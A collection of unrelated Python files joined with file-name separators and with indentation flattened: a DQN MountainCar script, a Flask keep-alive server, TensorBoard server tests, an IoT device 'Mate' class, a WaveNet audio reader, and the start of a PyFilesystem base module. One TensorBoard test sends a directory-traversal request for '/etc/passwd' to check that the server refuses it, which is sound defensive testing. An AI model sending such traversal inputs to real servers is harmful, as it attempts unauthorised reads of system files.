d= dqn_method( sess, build_dense_network, n_actions=e.action_space.n, n_features=e.observation_space.shape[0], layers=layers, hiddens=hiddens,
memory_size=MEMORY_SIZE, e_greedy_increment=0.001)
dqn.append( d)
for i in range(N_WORKERS):
if i==0:
dqn[i].set_replacement( dqn[ N_WORKERS-1].n_params, 100, 200)
else:
dqn[i].set_replacement( dqn[ i-1].n_params, 100, 200)
COORD = tf.train.Coordinator()
sess.run(tf.global_variables_initializer())
worker_threads = []
for i in range(N_WORKERS):
t = threading.Thread(target=worker, args=( i, COORD, env[i], dqn[i], steps, itr ) )
t.start()
worker_threads.append(t)
COORD.join(worker_threads)
def dqn( steps, itr):
global N_WORKERS
N_WORKERS= 1
env= gym.make('MountainCar-v0')
env= env.unwrapped
sess = tf.Session()
dqn= dqn_method( sess, build_dense_network, n_actions=env.action_space.n, n_features=env.observation_space.shape[0], layers=layers, hiddens=hiddens,
memory_size=MEMORY_SIZE, e_greedy_increment=0.001)
dqn.set_replacement( None, 500, 501)
COORD = tf.train.Coordinator()
sess.run(tf.global_variables_initializer())
worker( 0, COORD, env, dqn, steps, itr)
# python3 dqn_mountaincar.py 3000 1000 dqn
if __name__ == "__main__":
argv=sys.argv
steps= int(argv[1])
itr= int(argv[2])
if argv[3]=='a2dqn':
a2dqn( steps, itr)
else:
dqn( steps, itr)
#if __name__ == "__main__":
#argv=sys.argv
#steps= int(argv[1])
#itr= int(argv[2])
#dqn= dqn_method( build_dense_network, n_actions=env.action_space.n, n_features=env.observation_space.shape[0], layers=1, hiddens=20,
#memory_size=MEMORY_SIZE, replace_target_iter=300, e_greedy_increment=0.001)
#for i in range(itr):
#observation = env.reset()
#ep_r= 0
#for j in range(steps):
#env.render()
#action= dqn.choose_action(observation)
#observation_, reward, done, info = env.step(action)
#dqn.store_transition(observation, action, reward, observation_)
#ep_r= 0.9*ep_r + 0.1*reward
#if j%100==0:
#print('%d, %5d Reward:%f'%(i, j, ep_r))
#if j > MEMORY_SIZE : # learning
#dqn.learn()
#if done:
#break
#observation = observation_
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "Your bot is alive!"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
|
server_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for TensorBoard.
These tests start up a full-fledged TensorBoard server.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import base64
import gzip
import json
import numbers
import os
import shutil
import threading
import zlib
from six import BytesIO
from six.moves import http_client
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from google.protobuf import text_format
from tensorflow.contrib.tensorboard.plugins.projector.projector_config_pb2 import ProjectorConfig
from tensorflow.python.platform import resource_loader
from tensorflow.python.summary import event_multiplexer
from tensorflow.tensorboard.backend import server
from tensorflow.tensorboard.plugins import REGISTERED_PLUGINS
class TensorboardServerTest(tf.test.TestCase):
# Number of scalar-containing events to make.
_SCALAR_COUNT = 99
def setUp(self):
self._GenerateTestData()
self._multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=server.TENSORBOARD_SIZE_GUIDANCE)
server.ReloadMultiplexer(self._multiplexer, {self.get_temp_dir(): None})
# 0 to pick an unused port.
self._server = server.BuildServer(self._multiplexer, 'localhost', 0)
self._server_thread = threading.Thread(target=self._server.serve_forever)
self._server_thread.daemon = True
self._server_thread.start()
self._connection = http_client.HTTPConnection(
'localhost', self._server.server_address[1])
def tearDown(self):
self._connection.close()
self._server.shutdown()
self._server.server_close()
def _get(self, path, headers={}):
"""Perform a GET request for the given path."""
self._connection.request('GET', path, None, headers)
return self._connection.getresponse()
def _getJson(self, path):
"""Perform a GET request and decode the result as JSON."""
self._connection.request('GET', path)
response = self._connection.getresponse()
self.assertEqual(response.status, 200)
return json.loads(response.read().decode('utf-8'))
def testBasicStartup(self):
"""Start the server up and then shut it down immediately."""
pass
def testRequestMainPage(self):
"""Navigate to the main page and verify that it returns a 200."""
response = self._get('/')
self.assertEqual(response.status, 200)
def testRequestNonexistentPage(self):
"""Request a page that doesn't exist; it should 404."""
response = self._get('/asdf')
self.assertEqual(response.status, 404)
def testDirectoryTraversal(self):
"""Attempt a directory traversal attack."""
response = self._get('/..' * 30 + '/etc/passwd')
self.assertEqual(response.status, 404)
def testRuns(self):
"""Test the format of the /data/runs endpoint."""
run_json = self._getJson('/data/runs')
# Don't check the actual timestamp since it's time-dependent.
self.assertTrue(isinstance(run_json['run1']['firstEventTimestamp'],
numbers.Number))
del run_json['run1']['firstEventTimestamp']
self.assertEqual(run_json, {'run1': {'compressedHistograms': ['histogram'],
'scalars': ['simple_values'],
'histograms': ['histogram'],
'images': ['image'],
'audio': ['audio'],
'graph': True,
'run_metadata': ['test run']}})
def testHistograms(self):
"""Test the format of /data/histograms."""
self.assertEqual(
self._getJson('/data/histograms?tag=histogram&run=run1'),
[[0, 0, [0, 2.0, 3.0, 6.0, 5.0, [0.0, 1.0, 2.0], [1.0, 1.0, 1.0]]]])
def testSampleScalars(self):
"""Test the sample_count parameter of /data/scalars."""
for i in xrange(10, self._SCALAR_COUNT, 10):
samples = self._getJson('/data/scalars?sample_count=%d' % i)
values = samples['run1']['simple_values']
# Verify that we got the right amount of values and that we got the
# endpoints.
self.assertEqual(len(values), i)
self.assertEqual(values[0], [100, 10, 1])
self.assertEqual(values[-1], [9900, 990, 99])
def testSampleScalarsWithLargeSampleCount(self):
"""Test using a large sample_count."""
samples = self._getJson('/data/scalars?sample_count=999999')
values = samples['run1']['simple_values']
self.assertEqual(len(values), self._SCALAR_COUNT)
def testImages(self):
"""Test listing images and retrieving an individual image."""
image_json = self._getJson('/data/images?tag=image&run=run1')
image_query = image_json[0]['query']
# We don't care about the format of the image query.
del image_json[0]['query']
self.assertEqual(image_json, [{
'wall_time': 0,
'step': 0,
'height': 1,
'width': 1
}])
response = self._get('/data/individualImage?%s' % image_query)
self.assertEqual(response.status, 200)
def testAudio(self):
"""Test listing audio and retrieving an individual audio clip."""
audio_json = self._getJson('/data/audio?tag=audio&run=run1')
audio_query = audio_json[0]['query']
# We don't care about the format of the audio query.
del audio_json[0]['query']
self.assertEqual(audio_json, [{
'wall_time': 0,
'step': 0,
'content_type': 'audio/wav'
}])
response = self._get('/data/individualAudio?%s' % audio_query)
self.assertEqual(response.status, 200)
def testGraph(self):
"""Test retrieving the graph definition."""
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs')
self.assertEqual(response.status, 200)
graph_pbtxt = response.read()
# Parse the graph from pbtxt into a graph message.
graph = tf.GraphDef()
graph = text_format.Parse(graph_pbtxt, graph)
self.assertEqual(len(graph.node), 2)
self.assertEqual(graph.node[0].name, 'a')
self.assertEqual(graph.node[1].name, 'b')
# Make sure the second node has an attribute that was filtered out because
# it was too large and was added to the "too large" attributes list.
self.assertEqual(list(graph.node[1].attr.keys()), ['_very_large_attrs'])
self.assertEqual(graph.node[1].attr['_very_large_attrs'].list.s,
[b'very_large_attr'])
def testProjectorRunsWithEmbeddings(self):
"""Test the format of /runs endpoint in projector."""
if 'projector' not in REGISTERED_PLUGINS:
return
run_json = self._getJson('/data/plugin/projector/runs')
self.assertEqual(run_json, ['run1'])
def testProjectorInfo(self):
"""Test the format of /info endpoint in projector."""
if 'projector' not in REGISTERED_PLUGINS:
return
info_json = self._getJson('/data/plugin/projector/info?run=run1')
self.assertEqual(info_json['tensors'], {
'var1': {
'shape': [1, 2],
'name': 'var1',
'metadataFile': None
},
'var2': {
'shape': [10, 10],
'name': 'var2',
'metadataFile': None
},
'var3': {
'shape': [100, 100],
'name': 'var3',
'metadataFile': None
}
})
def testProjectorTensor(self):
"""Test the format of /tensor endpoint in projector."""
if 'projector' not in REGISTERED_PLUGINS:
return
tensor_tsv = (self._get('/data/plugin/projector/tensor?run=run1&name=var1')
.read())
self.assertEqual(tensor_tsv, b'6.0\t6.0')
def testAcceptGzip_compressesResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': 'gzip'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
graph = text_format.Parse(pbtxt, tf.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptAnyEncoding_compressesResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': '*'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
graph = text_format.Parse(pbtxt, tf.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptDoodleEncoding_doesNotCompressResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': 'doodle'})
self.assertEqual(response.status, 200)
self.assertIsNone(response.getheader('Content-Encoding'))
graph = text_format.Parse(response.read(), tf.GraphDef())
self.assertEqual(len(graph.node), 2)
def testRunMetadata(self):
"""Test retrieving the run metadata information."""
response = self._get('/data/run_metadata?run=run1&tag=test%20run')
self.assertEqual(response.status, 200)
run_metadata_pbtxt = response.read()
# Parse from pbtxt into a message.
run_metadata = tf.RunMetadata()
text_format.Parse(run_metadata_pbtxt, run_metadata)
self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
self.assertEqual(run_metadata.step_stats.dev_stats[0].device, 'test device')
def _GenerateTestData(self):
"""Generates the test data directory.
The test data has a single run named run1 which contains:
- a histogram
- an image at timestamp and step 0
- scalar events containing the value i at step 10 * i and wall time
100 * i, for i in [1, _SCALAR_COUNT).
- a graph definition
"""
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
run1_path = os.path.join(temp_dir, 'run1')
os.makedirs(run1_path)
writer = tf.train.SummaryWriter(run1_path)
histogram_value = tf.HistogramProto(min=0,
max=2,
num=3,
sum=6,
sum_squares=5,
bucket_limit=[0, 1, 2],
bucket=[1, 1, 1])
# Add a simple graph event.
graph_def = tf.GraphDef()
node1 = graph_def.node.add()
node1.name = 'a'
node2 = graph_def.node.add()
node2.name = 'b'
node2.attr['very_large_attr'].s = b'a' * 2048 # 2 KB attribute
writer.add_graph(graph_def)
# Add a simple run metadata event.
run_metadata = tf.RunMetadata()
device_stats = run_metadata.step_stats.dev_stats.add()
device_stats.device = 'test device'
writer.add_run_metadata(run_metadata, 'test run')
# 1x1 transparent GIF.
encoded_image = base64.b64decode(
'R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7')
image_value = tf.Summary.Image(height=1,
width=1,
colorspace=1,
encoded_image_string=encoded_image)
audio_value = tf.Summary.Audio(sample_rate=44100,
length_frames=22050,
num_channels=2,
encoded_audio_string=b'',
content_type='audio/wav')
writer.add_event(tf.Event(wall_time=0,
step=0,
summary=tf.Summary(value=[
tf.Summary.Value(tag='histogram',
histo=histogram_value),
tf.Summary.Value(tag='image',
image=image_value),
tf.Summary.Value(tag='audio',
audio=audio_value)
])))
# Write 100 simple values.
for i in xrange(1, self._SCALAR_COUNT + 1):
writer.add_event(tf.Event(
# We use different values for wall time, step, and the value so we can
# tell them apart.
wall_time=100 * i,
step=10 * i,
summary=tf.Summary(value=[tf.Summary.Value(tag='simple_values',
simple_value=i)])))
writer.flush()
writer.close()
if 'projector' in REGISTERED_PLUGINS:
self._GenerateProjectorTestData(run1_path)
def _GenerateProjectorTestData(self, run_path):
# Write a projector config file in run1.
config_path = os.path.join(run_path, 'projector_config.pbtxt')
config = ProjectorConfig()
config_pbtxt = text_format.MessageToString(config)
with tf.gfile.GFile(config_path, 'w') as f:
f.write(config_pbtxt)
# Write a checkpoint with some dummy variables.
with tf.Graph().as_default():
sess = tf.Session()
checkpoint_path = os.path.join(run_path, 'model')
tf.get_variable(
'var1', [1, 2], initializer=tf.constant_initializer(6.0))
tf.get_variable('var2', [10, 10])
tf.get_variable('var3', [100, 100])
sess.run(tf.initialize_all_variables())
saver = tf.train.Saver()
saver.save(sess, checkpoint_path)
class ParseEventFilesSpecTest(tf.test.TestCase):
def testRunName(self):
logdir_string = 'lol:/cat'
expected = {'/cat': 'lol'}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testPathWithColonThatComesAfterASlash_isNotConsideredARunName(self):
logdir_string = '/lol:/cat'
expected = {'/lol:/cat': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testMultipleDirectories(self):
logdir_string = '/a,/b'
expected = {'/a': None, '/b': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testNormalizesPaths(self):
logdir_string = '/lol/.//cat/../cat'
expected = {'/lol/cat': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testAbsolutifies(self):
logdir_string = 'lol/cat'
expected = {os.path.realpath('lol/cat'): None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testRespectsGCSPath(self):
logdir_string = 'gs://foo/path'
expected = {'gs://foo/path': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testDoesNotExpandUserInGCSPath(self):
logdir_string = 'gs://~/foo/path'
expected = {'gs://~/foo/path': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testDoesNotNormalizeGCSPath(self):
logdir_string = 'gs://foo/./path//..'
expected = {'gs://foo/./path//..': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
class TensorBoardAssetsTest(tf.test.TestCase):
def testTagFound(self):
tag = resource_loader.load_resource('tensorboard/TAG')
self.assertTrue(tag)
if __name__ == '__main__':
tf.test.main()
|
mate.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 JiNong, Inc.
# All right reserved.
#
"""
Base Mate를 정의함.
"""
import time
import util
import logging
import logging.handlers
import traceback
from calibration import Calibrator
from threading import Thread
from mblock import MBlock, BlkType
from enum import Enum
from devtype import DevType
from datetime import datetime
from dinfo import DevInfo
class Mate(object):
"""
Mate의 기본형을 정의함.
"""
def __init__(self, option, devinfo, coupleid, logger=None):
"""
Mate 의 Constructor. option과 devinfo를 주요 입력으로 함.
:param option: 작동을 위한 설정을 딕셔너리로 전달함
:param devinfo: 처리하는 장비의 아이디를 딕셔너리 형식으로 전달함. 다음과 같은 형식임.
id 는 장비의 아이디, dk 는 장비를 확인하기 위한 키값, dt는 장비의 타입, children은 하위 장비가 있는 경우에 하위 장비를 표현하기 위한 용도임.
devinfo : [
{"id" : "3", "dk" : "1", "dt": "nd", "children" : [
{"id" : "4", "dk" : "0", "dt": "sen"},
{"id" : "5", "dk" : "1", "dt": "sen"},
{"id" : "6", "dk" : "2", "dt": "act"},
{"id" : "7", "dk" : "3", "dt": "act/retractable/level0"}
]}
]
:param coupleid: 커플아이디.
:param logger: 로깅을 위한 로거. 없다면 내부적으로 만듬.
"""
self._option = option
print "mate initialized. ", option
self._coupleid = coupleid
self._sleep = {"time": 3, "obs": 19, "noti": 19} if "sleep" not in option else option["sleep"]
self._devinfo = DevInfo(devinfo)
self._writecb = None
self._executing = False
self._connected = False
self._msgq = None
if "backup" in option and "prefix" in option["backup"]:
self._backup = True
else:
self._backup = False
if logger is None:
self._logger = util.getdefaultlogger()
else:
self._logger = logger
self._calibrator = Calibrator(option, self._logger)
def __repr__(self):
return "{}({},{})".format(self.__class__.__name__, str(self._option), str(self._devinfo))
def start(self, _writecb):
""" Mate가 시작할때 호출됨 """
self._executing = True
self._writecb = _writecb
return True
def stop(self):
""" Mate가 중지될때 호출됨 """
self._executing = False
return True
def connect(self):
self._connected = True
return True
def close(self):
self._connected = False
def getvalue(self, k, v):
"""
센서값을계산할때 사용함
Calibrator 를 사용하며, 설정이 없는 경우 raw 값을 돌려줌
"""
return self._calibrator.calculate(k, v)
def isexecuting(self):
""" Mate가 작동중인지를 확인함 """
return self._executing
def isconnected(self):
""" Mate가 연결되어 있는지를 확인함 """
return self._connected
def writeblk(self, blk):
""" 외부에서 데이터 전달을 위해 호출되는 메소드. """
# external callback
print "###message : ", blk.get()
def readmsg(self):
""" Mate가 메세지를 읽는 함수. 직접구현해야함. """
self._msgq = [MBlock(0, BlkType.NONE, None)]
def backup(self, blk):
fname = "backup/" + self._option["backup"]["prefix"] + "-" + datetime.now().strftime("%Y%d%m") + ".bak"
with open(fname, "a") as fp:
fp.write(blk.stringify() + "\n")
def writecb(self, blk):
self._writecb(blk)
# backup
if self._backup:
self.backup(blk)
def sendobs(self):
""" 관측치를 전송한다. writecb를 사용함. """
pass
def sendnoti(self):
""" 노티를 전송한다. writecb를 사용함. """
pass
def doextra(self):
print("doextra-Mate", type(self).__name__)
pass
def run(self):
print ("mate run ... sleep : ", self._sleep["time"])
scnt = 0
while self.isexecuting():
try:
while self.isexecuting() == True and self.isconnected() == False:
if self.connect() == False:
self._logger.info("sleep 10 seconds and try to connect")
time.sleep(10)
else:
self._logger.info("reconnected!!")
if self.isexecuting() == False:
self._logger.info("finish to execute!!")
break
time.sleep(self._sleep["time"])
self.readmsg()
self.doextra()
if scnt % self._sleep["obs"] == 0:
self.sendobs()
if scnt % self._sleep["noti"] == 0:
self.sendnoti()
scnt = scnt + 1
except Exception as ex:
self._logger.warn("There is an exception : " + str(ex))
self._logger.warn(str(traceback.format_exc()))
try:
self.close()
except:
pass
print ("mate stop")
class ThreadMate(Mate):
def __init__(self, option, devinfo, coupleid, logger=None):
super(ThreadMate, self).__init__(option, devinfo, coupleid, logger)
self._logger.info("Mate Started.")
def start(self, _writecb):
"""
Mate가 시작할때 호출
:param writecb: 다른 메이트의 콜백메소드
"""
super(ThreadMate, self).start(_writecb)
self._thd = Thread(target=self.run)
self._thd.start()
return True
def stop(self):
""" Mate가 중지될때 호출됨 """
super(ThreadMate, self).stop()
self._thd.join()
return True
if __name__ == "__main__":
mate = ThreadMate({}, [], '1', None)
mate2 = Mate({}, [], '1', None)
mate.start(mate2.writeblk)
print ("mate started")
time.sleep(3)
mate.stop()
print ("mate stopped")
|
audio_reader.py
|
import fnmatch
import os
import random
import re
import threading
import json
import librosa
import numpy as np
import tensorflow as tf
from .ops import upsample_labels
FILE_PATTERN = r'p([0-9]+)_([0-9]+)\.wav'
def get_category_cardinality(files):
id_reg_expression = re.compile(FILE_PATTERN)
min_id = None
max_id = None
for filename in files:
matches = id_reg_expression.findall(filename)[0]
id, recording_id = [int(id_) for id_ in matches]
if min_id is None or id < min_id:
min_id = id
if max_id is None or id > max_id:
max_id = id
return min_id, max_id
def randomize_files(files):
for file in files:
file_index = random.randint(0, (len(files) - 1))
yield files[file_index]
def find_files(directory, pattern='*.wav'):
'''Recursively finds all files matching the pattern.'''
files = []
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, pattern):
files.append(os.path.join(root, filename))
return files
def load_generic_audio(directory, sample_rate):
'''Generator that yields audio waveforms from the directory.'''
files = find_files(directory)
label_files = find_files(directory, "*.json")
id_reg_exp = re.compile(FILE_PATTERN)
print("files length: {}".format(len(files)))
randomized_files = randomize_files(files)
for filename in randomized_files:
ids = id_reg_exp.findall(filename)
if not ids:
# The file name does not match the pattern containing ids, so
# there is no id.
category_id = None
else:
# The file name matches the pattern for containing ids.
category_id = int(ids[0][0])
if label_files:
with open("./%s.json" % ''.join(filename.split('.')[:-1]), 'r') as f:
labels = json.loads(f.read())
else:
labels = None
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
audio = audio.reshape(-1, 1)
yield audio, filename, category_id, labels
def trim_silence(audio, threshold):
'''Removes silence at the beginning and end of a sample.'''
energy = librosa.feature.rmse(audio)
frames = np.nonzero(energy > threshold)
indices = librosa.core.frames_to_samples(frames)[1]
# Note: indices can be an empty array, if the whole audio was silence.
return audio[indices[0]:indices[-1]] if indices.size else audio[0:0]
def not_all_have_id(files):
''' Return true iff any of the filenames does not conform to the pattern
we require for determining the category id.'''
id_reg_exp = re.compile(FILE_PATTERN)
for file in files:
ids = id_reg_exp.findall(file)
if not ids:
return True
return False
def not_all_have_label_file(wavs, labels):
if [w.split(".")[:-1] for w in wavs] != [l.split(".")[:-1] for l in labels]:
return True
class AudioReader(object):
'''Generic background audio reader that preprocesses audio files
and enqueues them into a TensorFlow queue.'''
def __init__(self,
audio_dir,
coord,
sample_rate,
gc_enabled,
lc_channels,
receptive_field,
sample_size=None,
silence_threshold=None,
queue_size=32):
self.audio_dir = audio_dir
self.sample_rate = sample_rate
self.coord = coord
self.sample_size = sample_size
self.receptive_field = receptive_field
self.silence_threshold = silence_threshold
self.gc_enabled = gc_enabled
self.lc_channels = lc_channels
self.threads = []
self.sample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.queue = tf.PaddingFIFOQueue(queue_size,
['float32'],
shapes=[(None, 1)])
self.enqueue = self.queue.enqueue([self.sample_placeholder])
if self.gc_enabled:
self.id_placeholder = tf.placeholder(dtype=tf.int32, shape=())
self.gc_queue = tf.PaddingFIFOQueue(queue_size, ['int32'],
shapes=[()])
self.gc_enqueue = self.gc_queue.enqueue([self.id_placeholder])
if self.lc_channels:
self.lc_placeholder = tf.placeholder(dtype=tf.float32, shape=(None, self.lc_channels))
self.lc_queue = tf.PaddingFIFOQueue(queue_size, ['float32'],
shapes=[(None, self.lc_channels)])
self.lc_enqueue = self.lc_queue.enqueue([self.lc_placeholder])
# TODO Find a better way to check this.
# Checking inside the AudioReader's thread makes it hard to terminate
# the execution of the script, so we do it in the constructor for now.
files = find_files(audio_dir)
if not files:
raise ValueError("No audio files found in '{}'.".format(audio_dir))
if self.gc_enabled and not_all_have_id(files):
raise ValueError("Global conditioning is enabled, but file names "
"do not conform to pattern having id.")
if self.lc_channels:
label_files = find_files(audio_dir, "*.json")
self.lc_label_files = label_files
if not_all_have_label_file(files, label_files):
raise ValueError("Local conditioning is enabled but wav files do not have "
"do not have corresponding JSON label files.")
# Determine the number of mutually-exclusive categories we will
# accomodate in our embedding table.
if self.gc_enabled:
_, self.gc_category_cardinality = get_category_cardinality(files)
# Add one to the largest index to get the number of categories,
# since tf.nn.embedding_lookup expects zero-indexing. This
# means one or more at the bottom correspond to unused entries
# in the embedding lookup table. But that's a small waste of memory
# to keep the code simpler, and preserves correspondance between
# the id one specifies when generating, and the ids in the
# file names.
self.gc_category_cardinality += 1
print("Detected --gc_cardinality={}".format(
self.gc_category_cardinality))
else:
self.gc_category_cardinality = None
def dequeue(self, num_elements):
output = self.queue.dequeue_many(num_elements)
return output
def dequeue_gc(self, num_elements):
return self.gc_queue.dequeue_many(num_elements)
def dequeue_lc(self, num_elements):
return self.lc_queue.dequeue_many(num_elements)
def thread_main(self, sess):
stop = False
# Go through the dataset multiple times
while not stop:
iterator = load_generic_audio(self.audio_dir, self.sample_rate)
for audio, filename, category_id, labels in iterator:
if self.coord.should_stop():
stop = True
break
if self.silence_threshold is not None:
# Remove silence
audio = trim_silence(audio[:, 0], self.silence_threshold)
audio = audio.reshape(-1, 1)
if audio.size == 0:
print("Warning: {} was ignored as it contains only "
"silence. Consider decreasing trim_silence "
"threshold, or adjust volume of the audio."
.format(filename))
original_audio_size = len(audio)
audio = np.pad(audio, [[self.receptive_field, 0], [0, 0]],
'constant')
if self.lc_channels:
upsampled_labels = upsample_labels(labels, original_audio_size)
upsampled_labels = np.pad(upsampled_labels, [[self.receptive_field, 0], [0, 0]], 'edge')
if self.sample_size:
# Cut samples into pieces of size receptive_field +
# sample_size with receptive_field overlap
while len(audio) > self.receptive_field:
piece = audio[:(self.receptive_field +
self.sample_size), :]
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: piece})
audio = audio[self.sample_size:, :]
if self.gc_enabled:
sess.run(self.gc_enqueue, feed_dict={
self.id_placeholder: category_id})
if self.lc_channels:
label_slice = upsampled_labels[:(self.receptive_field +
self.sample_size), :]
upsampled_labels = upsampled_labels[self.sample_size:, :]
sess.run(self.lc_enqueue, feed_dict={self.lc_placeholder: label_slice})
else:
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: audio})
if self.gc_enabled:
sess.run(self.gc_enqueue,
feed_dict={self.id_placeholder: category_id})
if self.lc_channels:
sess.run(self.lc_enqueue, feed_dict={self.lc_placeholder: upsampled_labels})
def start_threads(self, sess, n_threads=1):
for _ in range(n_threads):
thread = threading.Thread(target=self.thread_main, args=(sess,))
thread.daemon = True # Thread will close when parent quits.
thread.start()
self.threads.append(thread)
return self.threads
|
base.py
|
#!/usr/bin/env python
"""
fs.base
=======
This module defines the most basic filesystem abstraction, the FS class.
Instances of FS represent a filesystem containing files and directories
that can be queried and manipulated. To implement a new kind of filesystem,
start by sublcassing the base FS class.
For more information regarding implementing a working PyFilesystem interface, see :ref:`implementers`.
"""
__all__ = ['DummyLock',
'silence_fserrors',
'NullFile',
'synchronize',
'FS',
'flags_to_mode',
'NoDefaultMeta']
import os
import os.path
import shutil
import fnmatch
import datetime
import time
try:
import threading
except ImportError:
import dummy_threading as threading
from fs.path import *
from fs.errors import *
from fs.local_functools import wraps
class DummyLock(object):
"""A dummy lock object that doesn't do anything.
This is used as a placeholder when locking is disabled. We can't
directly use the Lock class from the dummy_threading module, since
it attempts to sanity-check the sequence of acquire/release calls
in a way that breaks when real threading is available.
"""
def acquire(self, blocking=1):
"""Acquiring a DummyLock always succeeds."""
return 1
def release(self):
"""Releasing a DummyLock always succeeds."""
pass
def __enter__(self):
pass
def __exit__(self, *args):
pass
def silence_fserrors(f, *args, **kwargs):
"""Perform a function call and return ``None`` if an :class:`fs.errors.FSError` is thrown
:param f: Function to call
:param args: Parameters to f
:param kwargs: Keyword parameters to f
"""
try:
return f(*args, **kwargs)
except FSError:
return None
class NoDefaultMeta(object):
"""A singleton used to signify that there is no default for getmeta"""
pass
class NullFile(object):
"""A NullFile is a file object that has no functionality.
Null files are returned by the :meth:`fs.base.FS.safeopen` method in FS objects when the
file doesn't exist. This can simplify code by negating the need to check
if a file exists, or handling exceptions.
"""
def __init__(self):
self.closed = False
def __iter__(self):
return self
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.closed = True
def flush(self):
pass
def next(self):
raise StopIteration
def readline(self, *args, **kwargs):
return ""
def close(self):
self.closed = True
def read(self, size=None):
return ""
def seek(self, *args, **kwargs):
pass
def tell(self):
return 0
def truncate(self, *args, **kwargs):
return 0
def write(self, data):
pass
def writelines(self, *args, **kwargs):
pass
def synchronize(func):
"""Decorator to synchronize a method on self._lock."""
@wraps(func)
def acquire_lock(self, *args, **kwargs):
self._lock.acquire()
try:
return func(self, *args, **kwargs)
finally:
self._lock.release()
return acquire_lock
class FS(object):
"""The base class for Filesystem abstraction objects.
An instance of a class derived from FS is an abstraction on some kind of filesystem, such as the OS filesystem or a zip file.
"""
_meta = {}
def __init__(self, thread_synchronize=False):
"""The base class for Filesystem objects.
:param thread_synconize: If True, a lock object will be created for the object, otherwise a dummy lock will be used.
:type thread_synchronize: bool
"""
super(FS, self).__init__()
self.closed = False
self.thread_synchronize = thread_synchronize
if thread_synchronize:
self._lock = threading.RLock()
else:
self._lock = DummyLock()
def __del__(self):
if not getattr(self, 'closed', True):
self.close()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def cachehint(self, enabled):
"""Recommends the use of caching. Implementations are free to use or
ignore this value.
:param enabled: If True the implementation is permitted to aggressively cache directory
structure / file information. Caching such information can speed up many operations,
particularly for network based filesystems. The downside of caching is that
changes made to directories or files outside of this interface may not be picked up immediately.
"""
pass
# Deprecating cache_hint in favour of no underscore version, for consistency
cache_hint = cachehint
def close(self):
"""Close the filesystem. This will perform any shutdown related
operations required. This method will be called automatically when
the filesystem object is garbage collected, but it is good practice
to call it explicitly so that any attached resourced are freed when they
are no longer required.
"""
self.closed = True
def __getstate__(self):
# Locks can't be pickled, so instead we just indicate the
# type of lock that should be there. None == no lock,
# True == a proper lock, False == a dummy lock.
state = self.__dict__.copy()
lock = state.get("_lock",None)
if lock is not None:
if isinstance(lock,threading._RLock):
state["_lock"] = True
else:
state["_lock"] = False
return state
def __setstate__(self,state):
self.__dict__.update(state)
lock = state.get("_lock")
if lock is not None:
if lock:
self._lock = threading.RLock()
else:
self._lock = DummyLock()
def getmeta(self, meta_name, default=NoDefaultMeta):
"""Retrieve a meta value associated with an FS object.
Meta values are a way for an FS implementation to report potentially
useful information associated with the file system.
A meta key is a lower case string with no spaces. Meta keys may also
be grouped in namespaces in a dotted notation, e.g. 'atomic.namespaces'.
FS implementations aren't obliged to return any meta values, but the
following are common:
* *read_only* True if the file system cannot be modified
* *thread_safe* True if the implementation is thread safe
* *network* True if the file system requires network access
* *unicode_paths* True if the file system supports unicode paths
* *case_insensitive_paths* True if the file system ignores the case of paths
* *atomic.makedir* True if making a directory is an atomic operation
* *atomic.rename* True if rename is an atomic operation, (and not implemented as a copy followed by a delete)
* *atomic.setcontents* True if the implementation supports setting the contents of a file as an atomic operation (without opening a file)
* *free_space* The free space (in bytes) available on the file system
* *total_space* The total space (in bytes) available on the file system
* *virtual* True if the filesystem defers to other filesystems
FS implementations may expose non-generic meta data through a self-named namespace. e.g. ``"somefs.some_meta"``
